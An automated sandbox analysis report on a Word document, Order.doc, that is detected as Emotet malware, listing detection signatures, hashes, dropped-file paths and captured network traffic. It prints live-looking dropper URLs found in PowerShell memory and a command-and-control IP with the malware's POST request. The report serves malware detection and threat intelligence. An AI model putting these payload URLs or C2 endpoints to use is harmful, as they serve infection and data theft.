Analysis Report Order.doc

Overview

General Information

Sample Name: Order.doc
Analysis ID: 344065
MD5: 1a0ae833990a558910254e9bebfaeeaf
SHA1: c6f348043fb590f9638ed792a331695475b79af1
SHA256: 5648715fe9ed7418d2d2b101a4ae8f4bb814ac68e422f78641595b37a83eb84e
Tags: Heodo

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: https://jflmktg.wpcomstaging.com/wp-content/AK/ Avira URL Cloud: Label: malware
Source: http://nightlifemumbai.club/x/0wBD3/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll ReversingLabs: Detection: 39%
Multi AV Scanner detection for submitted file
Source: Order.doc Virustotal: Detection: 32% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll Joe Sandbox ML: detected

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090952094.0000000002AB0000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: nightlifemumbai.club
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49167 -> 190.55.186.229:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 190.55.186.229 190.55.186.229
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View ASN Name: TelecentroSAAR TelecentroSAAR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /efl8dd1i/ HTTP/1.1DNT: 0Referer: 190.55.186.229/efl8dd1i/Content-Type: multipart/form-data; boundary=------------diOigcaeBsfwUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 6388Connection: Keep-AliveCache-Control: no-cache
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07A78F5-D643-47FF-B622-0CF30ED55516}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.2097800284.000000001B3E0000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: nightlifemumbai.club
Source: unknown HTTP traffic detected: POST /efl8dd1i/ HTTP/1.1DNT: 0Referer: 190.55.186.229/efl8dd1i/Content-Type: multipart/form-data; boundary=------------diOigcaeBsfwUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.55.186.229Content-Length: 6388Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Mon, 25 Jan 2021 22:13:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000002.2090020372.000000000048A000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000005.00000002.2097800284.000000001B3E0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2090481396.00000000024B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098401477.0000000002A70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000005.00000002.2098360010.000000001CE07000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095171986.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093779954.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095562122.00000000020E7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2095244145.0000000003AC4000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000005.00000002.2097891540.000000001B470000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000005.00000002.2095244145.0000000003AC4000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev
Source: powershell.exe, 00000005.00000002.2095129906.00000000039E2000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
